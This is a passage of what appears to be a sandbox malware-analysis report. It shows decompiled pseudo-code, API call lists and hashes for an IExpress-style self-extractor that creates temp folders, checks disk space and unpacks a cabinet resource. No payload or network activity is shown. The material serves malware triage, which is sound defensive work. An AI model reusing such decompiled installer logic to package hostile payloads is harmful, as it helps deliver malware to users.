                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A756B9
                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A7571E
                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A75737
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A757CD
                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A757EF
                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A75802
                                • Part of subcall function 00A72630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A72654
                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A75830
                                • Part of subcall function 00A76517: FindResourceA.KERNEL32(00A70000,000007D6,00000005), ref: 00A7652A
                                • Part of subcall function 00A76517: LoadResource.KERNEL32(00A70000,00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A76538
                                • Part of subcall function 00A76517: DialogBoxIndirectParamA.USER32(00A70000,00000000,00000547,00A719E0,00000000), ref: 00A76557
                                • Part of subcall function 00A76517: FreeResource.KERNEL32(00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A76560
                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A75878
                                • Part of subcall function 00A7597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A759A8
                                • Part of subcall function 00A7597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A759AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                              • API String ID: 2436801531-1384155332
                              • Opcode ID: 33a3036e68bc32292296130f1f8dec8c9306028e49e5d8430e1f0a957d736651
                              • Instruction ID: 91bb6cb0e23d988b22111e84e8d26774d40ee67f2c5a8c879173b1813286d387
                              • Opcode Fuzzy Hash: 33a3036e68bc32292296130f1f8dec8c9306028e49e5d8430e1f0a957d736651
                              • Instruction Fuzzy Hash: C3810771E04A046BDB24ABB48D95BEE73ADEF60300F44C865F58ED2191EFF48DC28A51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [Control-flow graph of function 00A7597D; nodes are marked as executed or not executed]
                              C-Code - Quality: 96%
                              			E00A7597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                              				signed int _v8;
                              				char _v16;
                              				char _v276;
                              				char _v788;
                              				long _v792;
                              				long _v796;
                              				long _v800;
                              				signed int _v804;
                              				long _v808;
                              				int _v812;
                              				long _v816;
                              				long _v820;
                              				void* __ebx;
                              				void* __esi;
                              				signed int _t46;
                              				int _t50;
                              				signed int _t55;
                              				void* _t66;
                              				int _t69;
                              				signed int _t73;
                              				signed short _t78;
                              				signed int _t87;
                              				signed int _t101;
                              				int _t102;
                              				unsigned int _t103;
                              				unsigned int _t105;
                              				signed int _t111;
                              				long _t112;
                              				signed int _t116;
                              				CHAR* _t118;
                              				signed int _t119;
                              				signed int _t120;
                              
                              				_t114 = __edi;
                              				_t46 =  *0xa78004; // 0x74742267
                              				_v8 = _t46 ^ _t120;
                              				_v804 = __edx;
                              				_t118 = __ecx;
                              				GetCurrentDirectoryA(0x104,  &_v276);
                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                              				if(_t50 != 0) {
                              					_push(__edi);
                              					_v796 = 0;
                              					_v792 = 0;
                              					_v800 = 0;
                              					_v808 = 0;
                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                              					__eflags = _t55;
                              					if(_t55 == 0) {
                              						L29:
                              						memset( &_v788, 0, 0x200);
                              						 *0xa79124 = E00A76285();
                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              						_t110 = 0x4b0;
                              						L30:
                              						__eflags = 0;
                              						E00A744B9(0, _t110, _t118,  &_v788, 0x10, 0);
                              						SetCurrentDirectoryA( &_v276);
                              						L31:
                              						_t66 = 0;
                              						__eflags = 0;
                              						L32:
                              						_pop(_t114);
                              						goto L33;
                              					}
                              					_t69 = _v792 * _v796;
                              					_v812 = _t69;
                              					_t116 = MulDiv(_t69, _v800, 0x400);
                              					__eflags = _t116;
                              					if(_t116 == 0) {
                              						goto L29;
                              					}
                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                              					__eflags = _t73;
                              					if(_t73 != 0) {
                              						SetCurrentDirectoryA( &_v276); // executed
                              						_t101 =  &_v16;
                              						_t111 = 6;
                              						_t119 = _t118 - _t101;
                              						__eflags = _t119;
                              						while(1) {
                              							_t22 = _t111 - 4; // 0x2
                              							__eflags = _t22;
                              							if(_t22 == 0) {
                              								break;
                              							}
                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                              							__eflags = _t87;
                              							if(_t87 == 0) {
                              								break;
                              							}
                              							 *_t101 = _t87;
                              							_t101 = _t101 + 1;
                              							_t111 = _t111 - 1;
                              							__eflags = _t111;
                              							if(_t111 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t111;
                              						if(_t111 == 0) {
                              							_t101 = _t101 - 1;
                              							__eflags = _t101;
                              						}
                              						 *_t101 = 0;
                              						_t112 = 0x200;
                              						_t102 = _v812;
                              						_t78 = 0;
                              						_t118 = 8;
                              						while(1) {
                              							__eflags = _t102 - _t112;
                              							if(_t102 == _t112) {
                              								break;
                              							}
                              							_t112 = _t112 + _t112;
                              							_t78 = _t78 + 1;
                              							__eflags = _t78 - _t118;
                              							if(_t78 < _t118) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t78 - _t118;
                              						if(_t78 != _t118) {
                              							__eflags =  *0xa79a34 & 0x00000008;
                              							if(( *0xa79a34 & 0x00000008) == 0) {
                              								L20:
                              								_t103 =  *0xa79a38; // 0x0
                              								_t110 =  *((intOrPtr*)(0xa789e0 + (_t78 & 0x0000ffff) * 4));
                              								L21:
                              								__eflags = (_v804 & 0x00000003) - 3;
                              								if((_v804 & 0x00000003) != 3) {
                              									__eflags = _v804 & 0x00000001;
                              									if((_v804 & 0x00000001) == 0) {
                              										__eflags = _t103 - _t116;
                              									} else {
                              										__eflags = _t110 - _t116;
                              									}
                              								} else {
                              									__eflags = _t103 + _t110 - _t116;
                              								}
                              								if(__eflags <= 0) {
                              									 *0xa79124 = 0;
                              									_t66 = 1;
                              								} else {
                              									_t66 = E00A7268B(_a4, _t110, _t103,  &_v16);
                              								}
                              								goto L32;
                              							}
                              							__eflags = _v816 & 0x00008000;
                              							if((_v816 & 0x00008000) == 0) {
                              								goto L20;
                              							}
                              							_t105 =  *0xa79a38; // 0x0
                              							_t110 =  *((intOrPtr*)(0xa789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa789e0 + (_t78 & 0x0000ffff) * 4));
                              							_t103 = (_t105 >> 2) +  *0xa79a38;
                              							goto L21;
                              						}
                              						_t110 = 0x4c5;
                              						E00A744B9(0, 0x4c5, 0, 0, 0x10, 0);
                              						goto L31;
                              					}
                              					memset( &_v788, 0, 0x200);
                              					 *0xa79124 = E00A76285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              					_t110 = 0x4f9;
                              					goto L30;
                              				} else {
                              					_t110 = 0x4bc;
                              					E00A744B9(0, 0x4bc, 0, 0, 0x10, 0);
                              					 *0xa79124 = E00A76285();
                              					_t66 = 0;
                              					L33:
                              					return E00A76CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                              				}
                              			}

                              APIs
                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A759A8
                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A759AF
                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A75A13
                              • MulDiv.KERNEL32(?,?,00000400), ref: 00A75A40
                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A75A64
                              • memset.MSVCRT ref: 00A75A7C
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A75A98
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A75AA5
                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A75BFC
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                              • String ID:
                              • API String ID: 4237285672-0
                              • Opcode ID: 49ccc860ccc357930e4958093ca7e24ea895a44a7bf13d44859d091126444797
                              • Instruction ID: 8c4ae2badb5aa4a795dee90e2f24e9a3768ff4a69e84dfc1f09bdc981df6987d
                              • Opcode Fuzzy Hash: 49ccc860ccc357930e4958093ca7e24ea895a44a7bf13d44859d091126444797
                              • Instruction Fuzzy Hash: 187185B1A0060CAFE715DB60CD85BFB77BCEB88340F54C5AAF50D96140E6749E868B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 374 a74fe0-a7501a call a7468f FindResourceA LoadResource LockResource 377 a75161-a75163 374->377 378 a75020-a75027 374->378 379 a75057-a7505e call a74efd 378->379 380 a75029-a75051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 a75060-a75077 call a744b9 379->383 384 a7507c-a750b4 379->384 380->379 388 a75107-a7510e 383->388 389 a750b6-a750da 384->389 390 a750e8-a75104 call a744b9 384->390 392 a75110-a75117 FreeResource 388->392 393 a7511d-a7511f 388->393 401 a75106 389->401 402 a750dc 389->402 390->401 392->393 394 a75121-a75127 393->394 395 a7513a-a75141 393->395 394->395 398 a75129-a75135 call a744b9 394->398 399 a75143-a7514a 395->399 400 a7515f 395->400 398->395 399->400 404 a7514c-a75159 SendMessageA 399->404 400->377 401->388 405 a750e3-a750e6 402->405 404->400 405->390 405->401
                              C-Code - Quality: 77%
                              			E00A74FE0(void* __edi, void* __eflags) {
                              				void* __ebx;
                              				void* _t8;
                              				struct HWND__* _t9;
                              				int _t10;
                              				void* _t12;
                              				struct HWND__* _t24;
                              				struct HWND__* _t27;
                              				intOrPtr _t29;
                              				void* _t33;
                              				int _t34;
                              				CHAR* _t36;
                              				int _t37;
                              				intOrPtr _t47;
                              
                              				_t33 = __edi;
                              				_t36 = "CABINET";
                              				 *0xa79144 = E00A7468F(_t36, 0, 0);
                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                              				 *0xa79140 = _t8;
                              				if(_t8 == 0) {
                              					return _t8;
                              				}
                              				_t9 =  *0xa78584; // 0x0
                              				if(_t9 != 0) {
                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                              					ShowWindow(GetDlgItem( *0xa78584, 0x841), 5); // executed
                              				}
                              				_t10 = E00A74EFD(0, 0); // executed
                              				if(_t10 != 0) {
                              					__imp__#20(E00A74CA0, E00A74CC0, E00A74980, E00A74A50, E00A74AD0, E00A74B60, E00A74BC0, 1, 0xa79148, _t33);
                              					_t34 = _t10;
                              					if(_t34 == 0) {
                              						L8:
                              						_t29 =  *0xa79148; // 0x0
                              						_t24 =  *0xa78584; // 0x0
                              						E00A744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                              						_t37 = 0;
                              						L9:
                              						goto L10;
                              					}
                              					__imp__#22(_t34, "*MEMCAB", 0xa71140, 0, E00A74CD0, 0, 0xa79140); // executed
                              					_t37 = _t10;
                              					if(_t37 == 0) {
                              						goto L9;
                              					}
                              					__imp__#23(_t34); // executed
                              					if(_t10 != 0) {
                              						goto L9;
                              					}
                              					goto L8;
                              				} else {
                              					_t27 =  *0xa78584; // 0x0
                              					E00A744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                              					_t37 = 0;
                              					L10:
                              					_t12 =  *0xa79140; // 0x0
                              					if(_t12 != 0) {
                              						FreeResource(_t12);
                              						 *0xa79140 = 0;
                              					}
                              					if(_t37 == 0) {
                              						_t47 =  *0xa791d8; // 0x0
                              						if(_t47 == 0) {
                              							E00A744B9(0, 0x4f8, 0, 0, 0x10, 0);
                              						}
                              					}
                              					if(( *0xa78a38 & 0x00000001) == 0 && ( *0xa79a34 & 0x00000001) == 0) {
                              						SendMessageA( *0xa78584, 0xfa1, _t37, 0);
                              					}
                              					return _t37;
                              				}
                              			}

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A74FFE
                              • LoadResource.KERNEL32(00000000,00000000), ref: 00A75006
                              • LockResource.KERNEL32(00000000), ref: 00A7500D
                              • GetDlgItem.USER32(00000000,00000842), ref: 00A75030
                              • ShowWindow.USER32(00000000), ref: 00A75037
                              • GetDlgItem.USER32(00000841,00000005), ref: 00A7504A
                              • ShowWindow.USER32(00000000), ref: 00A75051
                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A75111
                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A75159
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: *MEMCAB$CABINET
                              • API String ID: 1305606123-2642027498
                              • Opcode ID: b22c67206508cff2048c9d61d02309b1d5b587054dd303540e4dc3a9e7020875
                              • Instruction ID: ed2fe6663e6e4c6f74121c2e395f4531dede8aafff7dd5896a6682bd8da9fabb
                              • Opcode Fuzzy Hash: b22c67206508cff2048c9d61d02309b1d5b587054dd303540e4dc3a9e7020875
                              • Instruction Fuzzy Hash: 04310971B80701BFE710ABB1AD8DF6B369CB758755F44C625B90D921A1DBB48C828650
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E00A753A1(CHAR* __ecx, CHAR* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t5;
                              				long _t13;
                              				int _t14;
                              				CHAR* _t20;
                              				int _t29;
                              				int _t30;
                              				CHAR* _t32;
                              				signed int _t33;
                              				void* _t34;
                              
                              				_t5 =  *0xa78004; // 0x74742267
                              				_v8 = _t5 ^ _t33;
                              				_t32 = __edx;
                              				_t20 = __ecx;
                              				_t29 = 0;
                              				while(1) {
                              					E00A7171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                              					_t34 = _t34 + 0x10;
                              					_t29 = _t29 + 1;
                              					E00A71680(_t32, 0x104, _t20);
                              					E00A7658A(_t32, 0x104,  &_v268); // executed
                              					RemoveDirectoryA(_t32); // executed
                              					_t13 = GetFileAttributesA(_t32); // executed
                              					if(_t13 == 0xffffffff) {
                              						break;
                              					}
                              					if(_t29 < 0x190) {
                              						continue;
                              					}
                              					L3:
                              					_t30 = 0;
                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                              						_t30 = 1;
                              						DeleteFileA(_t32);
                              						CreateDirectoryA(_t32, 0);
                              					}
                              					L5:
                              					return E00A76CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                              				}
                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                              				if(_t14 == 0) {
                              					goto L3;
                              				}
                              				_t30 = 1;
                              				 *0xa78a20 = 1;
                              				goto L5;
                              			}

                              APIs
                                • Part of subcall function 00A7171E: _vsnprintf.MSVCRT ref: 00A71750
                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A753FB
                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75402
                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7541F
                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7542B
                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75434
                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75452
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                              • API String ID: 1082909758-957705000
                              • Opcode ID: 6fa79c8c9b9309a660a6dc2c92dcf82274552ec50d629341985815ebef2faf86
                              • Instruction ID: c23f18039d7621c91d9c4fbbb94d84ff7fa197fac703cc3ae18813276883dc75
                              • Opcode Fuzzy Hash: 6fa79c8c9b9309a660a6dc2c92dcf82274552ec50d629341985815ebef2faf86
                              • Instruction Fuzzy Hash: 0C11047270050477E720DB769C49FAF37ADEBD1311F00C525B54ED2190CEB4898386A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 478 a75467-a75484 479 a7551c-a75528 call a71680 478->479 480 a7548a-a75490 call a753a1 478->480 483 a7552d-a75539 call a758c8 479->483 484 a75495-a75497 480->484 493 a7554d-a75552 483->493 494 a7553b-a75545 CreateDirectoryA 483->494 486 a75581-a75583 484->486 487 a7549d-a754c0 call a71781 484->487 488 a7558d-a7559d call a76ce0 486->488 495 a754c2-a754d8 GetSystemInfo 487->495 496 a7550c-a7551a call a7658a 487->496 500 a75585-a7558b 493->500 501 a75554-a75557 call a7597d 493->501 498 a75577-a7557c call a76285 494->498 499 a75547 494->499 502 a754fe 495->502 503 a754da-a754dd 495->503 496->483 498->486 499->493 500->488 509 a7555c-a7555e 501->509 510 a75503-a75507 call a7658a 502->510 507 a754f7-a754fc 503->507 508 a754df-a754e2 503->508 507->510 513 a754e4-a754e7 508->513 514 a754f0-a754f5 508->514 509->500 515 a75560-a75566 509->515 510->496 513->496 517 a754e9-a754ee 513->517 514->510 515->486 518 a75568-a75575 RemoveDirectoryA 515->518 517->510 518->486
                              C-Code - Quality: 75%
                              			E00A75467(CHAR* __ecx, void* __edx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				struct _SYSTEM_INFO _v304;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t10;
                              				void* _t13;
                              				intOrPtr _t14;
                              				void* _t16;
                              				void* _t20;
                              				signed int _t26;
                              				void* _t28;
                              				void* _t29;
                              				CHAR* _t48;
                              				signed int _t49;
                              				intOrPtr _t61;
                              
                              				_t10 =  *0xa78004; // 0x74742267
                              				_v8 = _t10 ^ _t49;
                              				_push(__ecx);
                              				if(__edx == 0) {
                              					_t48 = 0xa791e4;
                              					_t42 = 0x104;
                              					E00A71680(0xa791e4, 0x104);
                              					L14:
                              					_t13 = E00A758C8(_t48); // executed
                              					if(_t13 != 0) {
                              						L17:
                              						_t42 = _a4;
                              						if(_a4 == 0) {
                              							L23:
                              							 *0xa79124 = 0;
                              							_t14 = 1;
                              							L24:
                              							return E00A76CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                              						}
                              						_t16 = E00A7597D(_t48, _t42, 1, 0); // executed
                              						if(_t16 != 0) {
                              							goto L23;
                              						}
                              						_t61 =  *0xa78a20; // 0x0
                              						if(_t61 != 0) {
                              							 *0xa78a20 = 0;
                              							RemoveDirectoryA(_t48);
                              						}
                              						L22:
                              						_t14 = 0;
                              						goto L24;
                              					}
                              					if(CreateDirectoryA(_t48, 0) == 0) {
                              						 *0xa79124 = E00A76285();
                              						goto L22;
                              					}
                              					 *0xa78a20 = 1;
                              					goto L17;
                              				}
                              				_t42 =  &_v268;
                              				_t20 = E00A753A1(__ecx,  &_v268); // executed
                              				if(_t20 == 0) {
                              					goto L22;
                              				}
                              				_push(__ecx);
                              				_t48 = 0xa791e4;
                              				E00A71781(0xa791e4, 0x104, __ecx,  &_v268);
                              				if(( *0xa79a34 & 0x00000020) == 0) {
                              					L12:
                              					_t42 = 0x104;
                              					E00A7658A(_t48, 0x104, 0xa71140);
                              					goto L14;
                              				}
                              				GetSystemInfo( &_v304);
                              				_t26 = _v304.dwOemId & 0x0000ffff;
                              				if(_t26 == 0) {
                              					_push("i386");
                              					L11:
                              					E00A7658A(_t48, 0x104);
                              					goto L12;
                              				}
                              				_t28 = _t26 - 1;
                              				if(_t28 == 0) {
                              					_push("mips");
                              					goto L11;
                              				}
                              				_t29 = _t28 - 1;
                              				if(_t29 == 0) {
                              					_push("alpha");
                              					goto L11;
                              				}
                              				if(_t29 != 1) {
                              					goto L12;
                              				}
                              				_push("ppc");
                              				goto L11;
                              			}





















                              APIs
                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A754C9
                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7553D
                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7556F
                                • Part of subcall function 00A753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A753FB
                                • Part of subcall function 00A753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75402
                                • Part of subcall function 00A753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7541F
                                • Part of subcall function 00A753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7542B
                                • Part of subcall function 00A753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75434
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                              • API String ID: 1979080616-772166365
                              • Opcode ID: 8061de8261691305a3a6b45fb00322636acb702a59addc6aa2919960f043a3d3
                              • Instruction ID: 9327e94a92df74a997feae0ba354588660f384d45fdeb5c76f455361afee5b16
                              • Opcode Fuzzy Hash: 8061de8261691305a3a6b45fb00322636acb702a59addc6aa2919960f043a3d3
                              • Instruction Fuzzy Hash: BC31F771F00A056BCB549B799D4597F77EBAB81340F08C13AA40EC6590DBF4CE428695
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 519 a7256d-a7257d 520 a72583-a72589 519->520 521 a72622-a72627 call a724e0 519->521 523 a7258b 520->523 524 a725e8-a72607 RegOpenKeyExA 520->524 526 a72629-a7262f 521->526 525 a72591-a72595 523->525 523->526 527 a725e3-a725e6 524->527 528 a72609-a72620 RegQueryInfoKeyA 524->528 525->526 530 a7259b-a725ba RegOpenKeyExA 525->530 527->526 531 a725d1-a725dd RegCloseKey 528->531 530->527 532 a725bc-a725cb RegQueryValueExA 530->532 531->527 532->531
                              C-Code - Quality: 86%
                              			E00A7256D(signed int __ecx) {
                              				int _v8;
                              				void* _v12;
                              				signed int _t13;
                              				signed int _t19;
                              				long _t24;
                              				void* _t26;
                              				int _t31;
                              				void* _t34;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t13 = __ecx & 0x0000ffff;
                              				_t31 = 0;
                              				if(_t13 == 0) {
                              					_t31 = E00A724E0(_t26);
                              				} else {
                              					_t34 = _t13 - 1;
                              					if(_t34 == 0) {
                              						_v8 = 0;
                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                              							goto L7;
                              						} else {
                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                              							goto L6;
                              						}
                              						L12:
                              					} else {
                              						if(_t34 > 0 && __ecx <= 3) {
